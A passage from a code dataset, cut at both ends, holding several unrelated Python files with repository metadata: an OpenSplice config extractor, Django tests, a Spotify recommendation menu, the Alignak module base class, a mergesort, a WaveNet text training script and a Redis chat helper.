!= cursor.spelling, \\\n \"cfgelem '{}' cannot be in group '{}' (must be unique)\".format(member.spelling,\n cursor.spelling)\n assert member.spelling in groups, \\\n \"attribute group {} is unknown\".format(member.spelling)\n ce.attributes = groups.pop(member.spelling)\n else:\n ce.attributes = None # This cfgelem has no attributes\n\n # int multiplicity\n member = members[3]\n assert member.kind == CursorKind.INTEGER_LITERAL, \\\n \"expected multiplicity integer-literal, member has kind {}\".format(member.kind)\n ce.multiplicity = list(member.get_tokens())[0].spelling\n\n # const char *default\n member = members[4].get_children().next()\n if member.kind == CursorKind.UNEXPOSED_EXPR:\n member = member.get_children().next()\n assert member.kind == CursorKind.STRING_LITERAL, \\\n \"expected default string-literal, member has kind {}\".format(member.kind)\n ce.default = member.spelling\n elif member.kind == CursorKind.PAREN_EXPR:\n # assume NULL, (0): no default\n ce.default = None\n else:\n assert False, \\\n \"expected default, got unsupported member kind {}\".format(member.kind)\n\n # int relative_offset\n # int elem_offset\n # init_fun_t init;\n\n # update_fun_t update;\n member = members[8].get_children().next()\n if member.kind == CursorKind.DECL_REF_EXPR:\n ce.typehint = member.spelling\n elif ce.children:\n # groups don't need a typehint\n ce.typehint = None\n else:\n assert False, \\\n \"expected update-func, got unsupported member kind {}\".format(member.kind)\n\n # free_fun_t free;\n # print_fun_t print;\n\n # const char *description;\n member = members[11].get_children().next().get_children().next()\n if member.kind == CursorKind.STRING_LITERAL:\n ce.description = member.spelling\n elif member.kind == CursorKind.CSTYLE_CAST_EXPR:\n print(\"Warning: element '{}' has no description!\".format(name))\n ce.description = None\n\n assert ce not in group, \\\n \"element '{}' already exists in group '{}'\".format(ce.name, cursor.spelling)\n group.append(ce)\n\n #print(ce)\n else:\n #print(\"Unsupported kind {} at {}\".format(elem.kind, elem.extent))\n pass\n\n # Everything should have been merged down to one \"root\" cfgelem group\n assert len(groups) == 1, \\\n \"Single root group expected, but multiple groups retrieved: {}\".format(\",\".join(groups.keys()))\n\n # Obtain the the meta-config\n assert \"OSPL_HOME\" in os.environ, \\\n \"OSPL_HOME env.var not set: unable to locate and parse OpenSplice meta-config file\"\n\n meta_path = os.path.join(os.environ[\"OSPL_HOME\"], \"src\", \"tools\", \"cm\", \"config\", \"code\")\n meta_file = os.path.join(meta_path, \"splice_metaconfig_6.1.xml\")\n\n parser = etree.XMLParser(strip_cdata=False, remove_blank_text=True)\n tree = etree.parse(meta_file, parser=parser)\n root = tree.getroot()\n\n group = groups[groups.keys()[0]]\n groupToXML(group, root)\n\n backup_file = \"{}.bak.xml\".format(meta_file[:-4])\n print(\"Rename original XML-file to {}\".format(backup_file))\n os.rename(meta_file, backup_file)\n tree.write(meta_file, pretty_print=True, xml_declaration=True, encoding=\"UTF-8\")\n\nif __name__ == \"__main__\":\n includes = sys.argv[1:-1]\n cfile = sys.argv[-1]\n\n index = clang.cindex.Index.create()\n tu = index.parse(cfile, args=includes)\n\n # Fail on parse errors\n diag = list(tu.diagnostics)\n if len(diag) > 0:\n pprint(diag)\n sys.exit(1)\n\n #print_cfgelem_ast(tu)\n extract(tu)\n","repo_name":"ADLINK-IST/opensplice","sub_path":"src/services/cmagent/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":21251,"program_lang":"python","lang":"en","doc_type":"code","stars":247,"dataset":"github-code","pt":"66"} +{"seq_id":"1168349311","text":"import pytest\nfrom django.db import models\nfrom main.config import setting\nfrom tenant.models import Organization, MainUser\n\nsetting.get_cached_configs()\n\n\n@pytest.fixture\ndef organization():\n return Organization.objects.create(\n name=\"sponix-user\",\n organization_id=setting.AUTH0_MANAGEMENT_ORGANIZATION_KEY\n )\n\n\n@pytest.fixture\ndef main_user(organization):\n return MainUser.objects.create(\n user_id=\"test_user\",\n organization=organization,\n active=True\n )\n\n\n@pytest.mark.django_db\ndef test_organization_model(organization):\n assert organization.name == \"sponix-user\"\n assert organization.organization_id == setting.AUTH0_MANAGEMENT_ORGANIZATION_KEY\n assert organization.set_organization_id() == organization.organization_id\n assert organization.is_manager is True\n\n\n@pytest.mark.django_db\ndef test_main_user_model(main_user):\n assert main_user.user_id == \"test_user\"\n assert main_user.organization.name == \"sponix-user\"\n assert main_user.active is True\n assert str(main_user) == f\"userID: {main_user.user_id} organization: {main_user.organization_id}\"\n assert main_user.is_authenticated is True\n assert main_user.is_anonymous is False\n assert main_user.is_staff is True\n","repo_name":"MohamadAhmadi100/django-multi-tenant","sub_path":"tenant/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70744873490","text":"from apis import spotify\nfrom apis import twilio\nimport pandas\n\ndef print_menu():\n print('''\n---------------------------------------------------------------------\nSettings / Browse Options\n---------------------------------------------------------------------\n1 - Select your favorite genres \n2 - Select your favorite artists \n3 - Discover new music\n4 - Quit\n---------------------------------------------------------------------\n ''')\n\ngenres=[] \ncounter=1\n\ndef handle_genre_selection():\n global counter\n print('\\nHandle genre selection here...', '\\n')\n genres_available=spotify.get_genres_abridged()\n for genre in genres_available:\n print(counter, '-',genre)\n counter+=1\n print('\\nSelect one or more genres (type the number of the genre)') \n \n user_genre_selection_01=int(input('\\nFirst choice: '))\n genres.append(genres_available[user_genre_selection_01 - 1])\n\n while True:\n user_number_of_genres_to_choose=int(input('How many more genres would you like to choose ( 0, 1, or 2)? '))\n \n if user_number_of_genres_to_choose ==1:\n user_genre_selection_02= int(input('Second choice: '))\n genres.append(genres_available[user_genre_selection_02 - 1])\n \n if user_number_of_genres_to_choose ==2:\n user_genre_selection_02= int(input('Second choice: '))\n user_genre_selection_03= int(input('Third choice: '))\n genres.append(genres_available[user_genre_selection_02 - 1])\n genres.append(genres_available[user_genre_selection_03 - 1])\n \n if user_number_of_genres_to_choose !=2 and user_number_of_genres_to_choose !=1 and user_number_of_genres_to_choose !=0:\n print('The number you entered is invalid, please enter either 0,1, or 2')\n continue\n print('Your genre choices are the following: ')\n for genre in genres:\n print(genre)\n decision_to_clear=input('Would you like to clear the list?(yes or no)')\n if decision_to_clear == 'yes':\n genres.clear()\n continue\n if decision_to_clear=='no':\n break\n\nartists=[]\ndef handle_artist_selection():\n second_counter=0\n while True:\n choose_artist=input('Write down a name of an artist: ')\n\n spotify_artist_result=spotify.get_artists(choose_artist)\n print ('Here are the following artists that were found:','\\n')\n for artist in spotify_artist_result:\n print(second_counter+1,'-',artist.get('name'))\n second_counter +=1\n \n what_artist_to_pick = input('\\nFrom this list, type up to 3 artists you want to listen to (seperate names by a comma)')\n what_artist_to_pick_as_a_list= what_artist_to_pick.split(',')\n \n for choice in what_artist_to_pick_as_a_list:\n artists.append(choice)\n print ('Here are the artists you picked:')\n for element in artists:\n print( '---',element)\n \n decision_to_clear_or_add =input('\\nWould you like to clear out the list or add more artists? (type \"no\", \"clear out\", or \"add\")')\n if decision_to_clear_or_add =='clear out':\n artists.clear()\n continue\n if decision_to_clear_or_add==\"add\":\n continue\n if decision_to_clear_or_add ==\"no\":\n break\n\ntemplate = '''\n \n {name}\n \n

    {name}

    \n

    Listen on Spotify

    \n \n \n \n'''\ndef get_recommendations():\n recommendations = spotify.get_similar_tracks(genres=genres)\n organized_table = pandas.DataFrame(recommendations)\n print (organized_table[['name','share_url']])\n\n\n email_or_not=input('Would you like to email this recommendation list? (yes or no)')\n if email_or_not == 'yes':\n organized_list_html =spotify.get_formatted_tracklist_table_html(recommendations)\n twilio.send_mail('nourtaqatqa2025@u.northwestern.edu',['nourtaqatqa2025@u.northwestern.edu','nour.s.taqatqa10@gmail.com'],\n 'Spotify recommendation list',organized_list_html)\n\n# Begin Main Program Loop:\nwhile True:\n print_menu()\n choice = input('What would you like to do? ')\n if choice == '1':\n handle_genre_selection()\n elif choice == '2':\n handle_artist_selection()\n elif choice == '3':\n get_recommendations() \n elif choice == '4':\n print('Quitting...')\n break\n else:\n print(choice, 'is an invalid choice. Please try again.')\n print()\n input('Press enter to continue...')\n","repo_name":"nour-taqatqa/CS-110-Project-Spotify","sub_path":"music_finder.py","file_name":"music_finder.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32044287809","text":"import numpy as np\n\ndatasets = np.array(range(1, 41)).reshape(10, 4) # 1부터 40까지 벡터/ 1차원\nprint(datasets)\nprint(datasets.shape) # (10, 4)\n\n# x_data = datasets(:, :3) #3-1\nx_data = datasets[:, :-1]\n# x_data = datasets[0:3]\ny_data = datasets[:, -1]\nprint(x_data)\nprint(y_data)\nprint(x_data.shape, y_data.shape) # (10, 3) (10,)\n\ntimesteps = 3\n\n#####x 만들기 #####\ndef split_x(dataset, timesteps): \n aaa = []\n for i in range(len(dataset) - timesteps):\n subset = dataset[i : (i + timesteps)]\n aaa.append(subset)\n return np.array(aaa)\n\n# 6번을 반복하겠어요\n# i는 카운트 하나씩 올라간다\n# if문, 반복문(for)\n\n# timesteps 6으로 해야 1시간 뒤에 걸 맞춘다\n\nbbb = split_x(x_data, timesteps)\nprint(bbb)\nprint(bbb.shape) # (5, 5, 3)\n\n##### y만들기 #####\ny_data = y_data[timesteps:]\nprint (y_data)","repo_name":"bigcenter91/Stduy_","sub_path":"keras/keras_41~50/keras43_split_4_행렬자르기.py","file_name":"keras43_split_4_행렬자르기.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"23564832082","text":"import os\nimport signal\nimport traceback\nimport re\nfrom multiprocessing import Queue, Process\nimport logging\n\nfrom alignak.misc.common import setproctitle, SIGNALS_TO_NAMES_DICT\n\nlogger = logging.getLogger(__name__) # pylint: disable=invalid-name\n\nKILL_TIME = 10\n\n# The `properties` dict defines what the module can do and\n# if it's an external module or not.\n# pylint: disable=invalid-name\nproperties = {\n # module type ; to distinguish between them:\n # retention, logs, configuration, livestate, ...\n 'type': None,\n\n # is the module \"external\" (external means here a daemon module)?\n 'external': True,\n\n # Possible configuration phases where the module is involved:\n 'phases': ['configuration', 'late_configuration', 'running', 'retention'],\n}\n\n\nclass BaseModule(object):\n # pylint: disable=too-many-instance-attributes\n \"\"\"This is the base class for the Alignak modules.\n Modules can be used by the different Alignak daemons for different tasks.\n Example of task that an Alignak module can do:\n - load additional configuration objects.\n - recurrently save hosts/services status/perfdata information in different format.\n - ...\n \"\"\"\n\n def __init__(self, mod_conf):\n \"\"\"Instantiate a new module.\n\n There can be many instance of the same module.\n\n mod_conf is a dictionary that contains:\n - all the variables declared in the module configuration file\n - a 'properties' value that is the module properties as defined globally in this file\n - a 'my_daemon' property that is a reference to the Daemon object that loaded the module\n\n :param mod_conf: module configuration file as a dictionary\n :type mod_conf: dict\n \"\"\"\n self.myconf = mod_conf\n self.name = mod_conf.get_name()\n self.my_daemon = getattr(mod_conf, 'my_daemon', None)\n\n self.props = mod_conf.properties.copy()\n # TODO: choose between 'props' or 'properties'..\n self.interrupted = False\n self.properties = self.props\n self.is_external = self.props.get('external', False)\n\n # though a module defined with no phase is quite useless .\n self.phases = self.props.get('phases', [])\n\n # the queue the module will receive data to manage\n self.to_q = None\n # the queue the module will put its result data\n self.from_q = None\n self.process = None\n self.illegal_char = re.compile(r'[^\\w-]')\n # Initialization try count and time\n self.init_try = 0\n self.last_init_try = 0\n # We want to know where we are load from? (broker, scheduler, etc)\n self.loaded_into = 'unknown'\n\n # External module force kill delay - default is to wait for\n # 60 seconds before killing a module abruptly\n self.kill_delay = int(getattr(mod_conf, 'kill_delay', '60'))\n\n # Self module monitoring (cpu, memory)\n self.module_monitoring = False\n self.module_monitoring_period = 10\n if 'ALIGNAK_DAEMON_MONITORING' in os.environ:\n self.module_monitoring = True\n try:\n self.system_health_period = int(os.environ.get('ALIGNAK_DAEMON_MONITORING', '10'))\n except ValueError: # pragma: no cover, simple protection\n pass\n if self.module_monitoring:\n print(\"Module self monitoring is enabled, reporting every %d loop count.\"\n % self.module_monitoring_period)\n\n @property\n def alias(self):\n \"\"\"Module name may be stored in an alias property\n Stay compatible with older modules interface\n \"\"\"\n return self.name\n\n def get_name(self):\n \"\"\"Wrapper to access name attribute\n\n :return: module name\n :rtype: str\n \"\"\"\n return self.name\n\n def init(self): # pylint: disable=no-self-use\n \"\"\"Handle this module \"post\" init ; just before it'll be started.\n\n This function initializes the module instance. If False is returned, the modules manager\n will periodically retry an to initialize the module.\n If an exception is raised, the module will be definitely considered as dead :/\n\n This function must be present and return True for Alignak to consider the module as loaded\n and fully functional.\n\n :return: True / False according to initialization succeeded or not\n :rtype: bool\n \"\"\"\n return True\n\n def set_loaded_into(self, daemon_name):\n \"\"\"Setter for loaded_into attribute\n Used to know what daemon has loaded this module\n\n :param daemon_name: value to set\n :type daemon_name: str\n :return: None\n \"\"\"\n self.loaded_into = daemon_name\n\n def create_queues(self, manager=None):\n \"\"\"\n Create the shared queues that will be used by alignak daemon\n process and this module process.\n But clear queues if they were already set before recreating new one.\n\n Note:\n If manager is None, then we are running the unit tests for the modules and\n we must create some queues for the external modules without a SyncManager\n\n :param manager: Manager() object\n :type manager: None | object\n :return: None\n \"\"\"\n self.clear_queues(manager)\n # If no Manager() object, go with classic Queue()\n if not manager:\n self.from_q = Queue()\n self.to_q = Queue()\n else:\n self.from_q = manager.Queue()\n self.to_q = manager.Queue()\n\n def clear_queues(self, manager):\n \"\"\"Release the resources associated to the queues of this instance\n\n :param manager: Manager() object\n :type manager: None | object\n :return: None\n \"\"\"\n for queue in (self.to_q, self.from_q):\n if queue is None:\n continue\n # If we got no manager, we directly call the clean\n if not manager:\n try:\n queue.close()\n queue.join_thread()\n except AttributeError:\n pass\n # else:\n # q._callmethod('close')\n # q._callmethod('join_thread')\n self.to_q = self.from_q = None\n\n def start_module(self):\n \"\"\"Wrapper for _main function.\n Catch and raise any exception occurring in the main function\n\n :return: None\n \"\"\"\n try:\n self._main()\n except Exception as exp:\n logger.exception('%s', traceback.format_exc())\n raise Exception(exp)\n\n def start(self, http_daemon=None): # pylint: disable=unused-argument\n \"\"\"Actually restart the process if the module is external\n Try first to stop the process and create a new Process instance\n with target start_module.\n Finally start process.\n\n :param http_daemon: Not used here but can be used in other modules\n :type http_daemon: None | object\n :return: None\n \"\"\"\n\n if not self.is_external:\n return\n\n if self.process:\n self.stop_process()\n logger.info(\"Starting external process for module %s...\", self.name)\n proc = Process(target=self.start_module, args=(), group=None)\n\n # Under windows we should not call start() on an object that got its process\n # as an object, so we remove it and we set it in a earlier start\n try:\n del self.properties['process']\n except KeyError:\n pass\n\n proc.start()\n # We save the process data AFTER the fork()\n self.process = proc\n self.properties['process'] = proc\n logger.info(\"%s is now started (pid=%d)\", self.name, proc.pid)\n\n def kill(self):\n \"\"\"Sometime terminate() is not enough, we must \"help\"\n external modules to die...\n\n :return: None\n \"\"\"\n\n logger.info(\"Killing external module (pid=%d) for module %s...\",\n self.process.pid, self.name)\n if os.name == 'nt':\n self.process.terminate()\n else:\n self.process.terminate()\n # Wait for 10 seconds before killing the process abruptly\n self.process.join(timeout=KILL_TIME)\n # You do not let me another choice guy...\n if self.process.is_alive():\n logger.warning(\"%s is still living %d seconds after a normal kill, \"\n \"I help it to die\", self.name, KILL_TIME)\n os.kill(self.process.pid, signal.SIGKILL)\n self.process.join(1)\n if self.process.is_alive():\n logger.error(\"%s still living after brutal kill, I leave it.\", self.name)\n logger.info(\"External module killed\")\n\n def stop_process(self):\n \"\"\"Request the module process to stop and release it\n\n :return: None\n \"\"\"\n if not self.process:\n return\n\n logger.info(\"I'm stopping module %r (pid=%d)\", self.name, self.process.pid)\n self.kill()\n # Clean inner process reference\n self.process = None\n\n def want_brok(self, b): # pylint: disable=unused-argument,no-self-use\n \"\"\"Generic function to check if the module need a specific brok\n In this case it is always True\n\n :param b: brok to check\n :type b: alignak.brok.Brok\n :return: True if the module wants the brok, False otherwise\n :rtype: bool\n \"\"\"\n return True\n\n def manage_brok(self, brok):\n \"\"\"Request the module to manage the given brok.\n There are a lot of different possible broks to manage. The list is defined\n in the Brok class.\n\n An internal module may redefine this function or, easier, define only the function\n for the brok it is interested with. Hence a module interested in the `service_check_result`\n broks will only need to define a function named as `manage_service_check_result_brok`\n\n :param brok:\n :type brok:\n :return:\n :rtype:\n \"\"\"\n\n manage = getattr(self, 'manage_' + brok.type + '_brok', None)\n if not manage:\n return False\n\n # Be sure the brok is prepared before calling the function\n brok.prepare()\n return manage(brok)\n\n def manage_signal(self, sig, frame): # pylint: disable=unused-argument\n \"\"\"Generic function to handle signals\n\n Only called when the module process received SIGINT or SIGKILL.\n\n Set interrupted attribute to True, self.process to None and returns\n\n :param sig: signal sent\n :type sig:\n :param frame: frame before catching signal\n :type frame:\n :return: None\n \"\"\"\n logger.info(\"received a signal: %s\", SIGNALS_TO_NAMES_DICT[sig])\n\n if sig == signal.SIGHUP:\n # if SIGHUP, reload configuration in arbiter\n logger.info(\"Modules are not able to reload their configuration. \"\n \"Stopping the module...\")\n\n logger.info(\"Request to stop the module\")\n self.interrupted = True\n # self.process = None\n\n def set_signal_handler(self, sigs=None):\n \"\"\"Set the signal handler to manage_signal (defined in this class)\n\n Only set handlers for:\n - signal.SIGTERM, signal.SIGINT\n - signal.SIGUSR1, signal.SIGUSR2\n - signal.SIGHUP\n\n :return: None\n \"\"\"\n if sigs is None:\n sigs = (signal.SIGTERM, signal.SIGINT, signal.SIGUSR1, signal.SIGUSR2, signal.SIGHUP)\n\n func = self.manage_signal\n if os.name == \"nt\": # pragma: no cover, no Windows implementation currently\n try:\n import win32api\n win32api.SetConsoleCtrlHandler(func, True)\n except ImportError:\n version = \".\".join([str(i) for i in os.sys.version_info[:2]])\n raise Exception(\"pywin32 not installed for Python \" + version)\n else:\n for sig in sigs:\n signal.signal(sig, func)\n\n set_exit_handler = set_signal_handler\n\n def do_stop(self):\n \"\"\"Called just before the module will exit\n Put in this method all you need to cleanly\n release all open resources used by your module\n\n :return: None\n \"\"\"\n pass\n\n def do_loop_turn(self):\n \"\"\"For external modules only:\n implement in this method the body of you main loop\n\n :return: None\n \"\"\"\n raise NotImplementedError()\n\n def set_proctitle(self, name):\n \"\"\"Wrapper for setproctitle method\n\n :param name: module alias\n :type name: str\n :return: None\n \"\"\"\n setproctitle(\"alignak-%s module: %s\" % (self.loaded_into, name))\n\n def main(self):\n \"\"\"\n Main function of BaseModule\n\n :return: None\n \"\"\"\n logger.info(\"BaseModule.main() not defined in your %s\", self.__class__)\n\n def _main(self):\n \"\"\"module \"main\" method. Only used by external modules.\n\n :return: None\n \"\"\"\n self.set_proctitle(self.name)\n self.set_signal_handler()\n\n logger.info(\"process for module %s is now running (pid=%d)\", self.name, os.getpid())\n\n # Will block here!\n try:\n self.main()\n except (IOError, EOFError):\n pass\n # logger.warning('[%s] EOF exception: %s', self.name, traceback.format_exc())\n except Exception as exp: # pylint: disable=broad-except\n logger.exception('main function exception: %s', exp)\n\n self.do_stop()\n\n logger.info(\"process for module %s is now exiting (pid=%d)\", self.name, os.getpid())\n exit()\n\n # TODO: apparently some modules would uses \"work\" as the main method??\n work = _main\n","repo_name":"Alignak-monitoring/alignak","sub_path":"alignak/basemodule.py","file_name":"basemodule.py","file_ext":"py","file_size_in_byte":13849,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"66"} +{"seq_id":"41814564180","text":"def merge(left, right):\n L = []\n i = j = 0\n\n while i < len(left) or j < len(right):\n if i >= len(left):\n L.append(right[j])\n j += 1\n elif j >= len(right):\n L.append(left[i])\n i += 1\n else:\n if left[i] <= right[j]:\n L.append(left[i])\n i += 1\n else:\n L.append(right[j])\n j += 1\n return L\n\ndef bottom_up_mergesort(L):\n length=len(L)\n if(length<=2): #This is the edge case when list is smaller than 2\n if(length<2):\n return L\n else:\n if(L[0]>L[1]):\n L[0],L[1]=L[1],L[0]\n return L\n i=2\n while(i=length): #This is to sort the whole list one last time\n l=length-len(temp)\n left=L[:l]\n right=L[l:]\n temp = merge(left, right)\n\n L=temp\n return L\n\nL2=[-74,48,-20,2,10,-84,-5,-9,11,-24,-91,2,-71,64,63,80,28,-30,-58,-11,-44,-87,-22,54,-74,-10,-55,-28,-46,29,10,50,-72,34,26,25,8,51,13,30,35,-8,50,65,-6,16,-2,21,-78,35,-13,14,23,-3,26,-90,86,25,-56,91,-13,92,-25,37,57,-20,-69,98,95,45,47,29,86,-28,73,-44,-46,65,-84,-96,-24,-12,72,-68,93,57,92,52,-45,-2,85,-63,56,55,12,-85,77,-39]\nprint(bottom_up_mergesort(L2))\n","repo_name":"Zicheng-Li/sorting-lab","sub_path":"bottom_up_mergesort.py","file_name":"bottom_up_mergesort.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3539802274","text":"from django.contrib import admin\nfrom django.urls import path\n\nfrom . import views\n\n\nurlpatterns = [\n path('',views.index, name='index'),\n path('index.html',views.index, name='index'),\n path('about.html',views.about, name='about'),\n path('blog.html',views.blog, name='blog'),\n path('contact.html',views.contact, name='contact'),\n path('pakages.html',views.pakages, name='pakages'),\n]\n","repo_name":"Aniket0898/traveller","sub_path":"travel/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6001518185","text":"\"\"\"Training script for the WaveNet network.\"\"\"\n\nfrom __future__ import print_function\n\nimport argparse\nfrom datetime import datetime\nimport json\nimport os\nimport sys\nimport time\n\nimport tensorflow as tf\n\nfrom wavenet import WaveNetModel, TextReader\n\nBATCH_SIZE = 1\nDATA_DIRECTORY = './data'\nLOGDIR_ROOT = './logdir'\nCHECKPOINT_EVERY = 500\nNUM_STEPS = 4000\nLEARNING_RATE = 0.001\nWAVENET_PARAMS = './wavenet_params.json'\nSTARTED_DATESTRING = \"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now())\nSAMPLE_SIZE = 1000\nL2_REGULARIZATION_STRENGTH = 0\n\n\ndef get_arguments():\n parser = argparse.ArgumentParser(description='WaveNet example network')\n parser.add_argument('--batch_size', type=int, default=BATCH_SIZE,\n help='How many wav files to process at once.')\n parser.add_argument('--data_dir', type=str, default=DATA_DIRECTORY,\n help='The directory containing the VCTK corpus.')\n parser.add_argument('--logdir', type=str, default=None,\n help='Directory in which to store the logging '\n 'information for TensorBoard. '\n 'If the model already exists, it will restore '\n 'the state and will continue training. '\n 'Cannot use with --logdir_root and --restore_from.')\n parser.add_argument('--logdir_root', type=str, default=None,\n help='Root directory to place the logging '\n 'output and generated model. These are stored '\n 'under the dated subdirectory of --logdir_root. '\n 'Cannot use with --logdir.')\n parser.add_argument('--restore_from', type=str, default=None,\n help='Directory in which to restore the model from. '\n 'This creates the new model under the dated directory '\n 'in --logdir_root. '\n 'Cannot use with --logdir.')\n parser.add_argument('--checkpoint_every', type=int, default=CHECKPOINT_EVERY,\n help='How many steps to save each checkpoint after')\n parser.add_argument('--num_steps', type=int, default=NUM_STEPS,\n help='Number of training steps.')\n parser.add_argument('--learning_rate', type=float, default=LEARNING_RATE,\n help='Learning rate for training.')\n parser.add_argument('--wavenet_params', type=str, default=WAVENET_PARAMS,\n help='JSON file with the network parameters.')\n parser.add_argument('--sample_size', type=int, default=SAMPLE_SIZE,\n help='Concatenate and cut text samples to this many '\n 'samples.')\n parser.add_argument('--l2_regularization_strength', type=float,\n default=L2_REGULARIZATION_STRENGTH,\n help='Coefficient in the L2 regularization. '\n 'Disabled by default')\n return parser.parse_args()\n\n\ndef save(saver, sess, logdir, step):\n model_name = 'model.ckpt'\n checkpoint_path = os.path.join(logdir, model_name)\n print('Storing checkpoint to {} ...'.format(logdir), end=\"\")\n sys.stdout.flush()\n\n if not os.path.exists(logdir):\n os.makedirs(logdir)\n\n saver.save(sess, checkpoint_path, global_step=step)\n print(' Done.')\n\n\ndef load(saver, sess, logdir):\n print(\"Trying to restore saved checkpoints from {} ...\".format(logdir),\n end=\"\")\n\n ckpt = tf.train.get_checkpoint_state(logdir)\n if ckpt:\n print(\" Checkpoint found: {}\".format(ckpt.model_checkpoint_path))\n global_step = int(ckpt.model_checkpoint_path\n .split('/')[-1]\n .split('-')[-1])\n print(\" Global step was: {}\".format(global_step))\n print(\" Restoring...\", end=\"\")\n saver.restore(sess, ckpt.model_checkpoint_path)\n print(\" Done.\")\n return global_step\n else:\n print(\" No checkpoint found.\")\n return None\n\n\ndef get_default_logdir(logdir_root):\n logdir = os.path.join(logdir_root, 'train', STARTED_DATESTRING)\n return logdir\n\n\ndef validate_directories(args):\n \"\"\"Validate and arrange directory related arguments.\"\"\"\n\n # Validation\n if args.logdir and args.logdir_root:\n raise ValueError(\"--logdir and --logdir_root cannot be \"\n \"specified at the same time.\")\n\n if args.logdir and args.restore_from:\n raise ValueError(\n \"--logdir and --restore_from cannot be specified at the same \"\n \"time. This is to keep your previous model from unexpected \"\n \"overwrites.\\n\"\n \"Use --logdir_root to specify the root of the directory which \"\n \"will be automatically created with current date and time, or use \"\n \"only --logdir to just continue the training from the last \"\n \"checkpoint.\")\n\n # Arrangement\n logdir_root = args.logdir_root\n if logdir_root is None:\n logdir_root = LOGDIR_ROOT\n\n logdir = args.logdir\n if logdir is None:\n logdir = get_default_logdir(logdir_root)\n print('Using default logdir: {}'.format(logdir))\n\n restore_from = args.restore_from\n if restore_from is None:\n # args.logdir and args.restore_from are exclusive,\n # so it is guaranteed the logdir here is newly created.\n restore_from = logdir\n\n return {\n 'logdir': logdir,\n 'logdir_root': args.logdir_root,\n 'restore_from': restore_from\n }\n\n\ndef main():\n args = get_arguments()\n\n try:\n directories = validate_directories(args)\n except ValueError as e:\n print(\"Some arguments are wrong:\")\n print(str(e))\n return\n\n logdir = directories['logdir']\n restore_from = directories['restore_from']\n\n # Even if we restored the model, we will treat it as new training\n # if the trained model is written into an arbitrary location.\n is_overwritten_training = logdir != restore_from\n\n with open(args.wavenet_params, 'r') as f:\n wavenet_params = json.load(f)\n\n # Create coordinator.\n coord = tf.train.Coordinator()\n\n # Load raw text.\n with tf.name_scope('create_inputs'):\n reader = TextReader(\n args.data_dir,\n coord,\n sample_size=args.sample_size)\n text_batch = reader.dequeue(args.batch_size)\n\n # Create network.\n net = WaveNetModel(\n batch_size=args.batch_size,\n dilations=wavenet_params[\"dilations\"],\n filter_width=wavenet_params[\"filter_width\"],\n residual_channels=wavenet_params[\"residual_channels\"],\n dilation_channels=wavenet_params[\"dilation_channels\"],\n skip_channels=wavenet_params[\"skip_channels\"],\n quantization_channels=wavenet_params[\"quantization_channels\"],\n use_biases=wavenet_params[\"use_biases\"])\n if args.l2_regularization_strength == 0:\n args.l2_regularization_strength = None\n loss = net.loss(text_batch, args.l2_regularization_strength)\n optimizer = tf.train.AdamOptimizer(learning_rate=args.learning_rate)\n trainable = tf.trainable_variables()\n optim = optimizer.minimize(loss, var_list=trainable)\n\n # Set up session\n sess = tf.Session(config=tf.ConfigProto(log_device_placement=False))\n init = tf.initialize_all_variables()\n sess.run(init)\n\n # Saver for storing checkpoints of the model.\n saver = tf.train.Saver()\n\n try:\n saved_global_step = load(saver, sess, restore_from)\n if is_overwritten_training or saved_global_step is None:\n # The first training step will be saved_global_step + 1,\n # therefore we put -1 here for new or overwritten trainings.\n saved_global_step = -1\n\n except:\n print(\"Something went wrong while restoring checkpoint. \"\n \"We will terminate training to avoid accidentally overwriting \"\n \"the previous model.\")\n raise\n\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n reader.start_threads(sess)\n\n try:\n last_saved_step = saved_global_step\n for step in range(saved_global_step + 1, args.num_steps):\n start_time = time.time()\n loss_value, _ = sess.run([loss, optim])\n print(\"fin step\", step)\n duration = time.time() - start_time\n print('step {:d} - loss = {:.3f}, ({:.3f} sec/step)'\n .format(step, loss_value, duration))\n\n if step % args.checkpoint_every == 0:\n save(saver, sess, logdir, step)\n last_saved_step = step\n\n except KeyboardInterrupt:\n # Introduce a line break after ^C is displayed so save message\n # is on its own line.\n print()\n finally:\n if step > last_saved_step:\n save(saver, sess, logdir, step)\n coord.request_stop()\n coord.join(threads)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Zeta36/tensorflow-tex-wavenet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8974,"program_lang":"python","lang":"en","doc_type":"code","stars":344,"dataset":"github-code","pt":"66"} +{"seq_id":"25067533405","text":"import asyncio\nfrom fastapi.websockets import WebSocket, WebSocketDisconnect\nfrom redis.asyncio import Redis\nfrom db.models import Room, Message, User\nfrom pydantic.error_wrappers import ValidationError\nimport logging\n\n\nclass RedisService:\n def __init__(self, redis: Redis):\n self._redis = redis\n\n def _make_user_key(self, username: str) -> str:\n return f\"user:{username}\"\n\n def _make_room_key(self, chat_id: str) -> str:\n return f\"room:{chat_id}\"\n\n async def add_user_to_room(self, username: str, room_id: str):\n user_key = self._make_user_key(username)\n room_key = self._make_room_key(room_id)\n await self._redis.sadd(room_key, user_key)\n\n async def remove_user_from_room(self, username: str, room_id: str):\n user_key = self._make_user_key(username)\n room_key = self._make_room_key(room_id)\n await self._redis.srem(room_key, user_key)\n\n async def get_room_info(self, room_id: str) -> list[User]:\n room_key = self._make_room_key(room_id)\n users = await self._redis.smembers(room_key)\n return [User.parse_raw(user) for user in users]\n\n async def user_room_exists(self, username: str, room_id: str) -> bool:\n user_key = self._make_user_key(username)\n room_key = self._make_room_key(room_id)\n return await self._redis.sismember(room_key, user_key)\n\n async def send_message_to_stream(self, room_id: str, fields):\n await self._redis.xadd(\n name=f\"room:{room_id}:stream\", fields=fields, maxlen=1000\n )\n\n async def 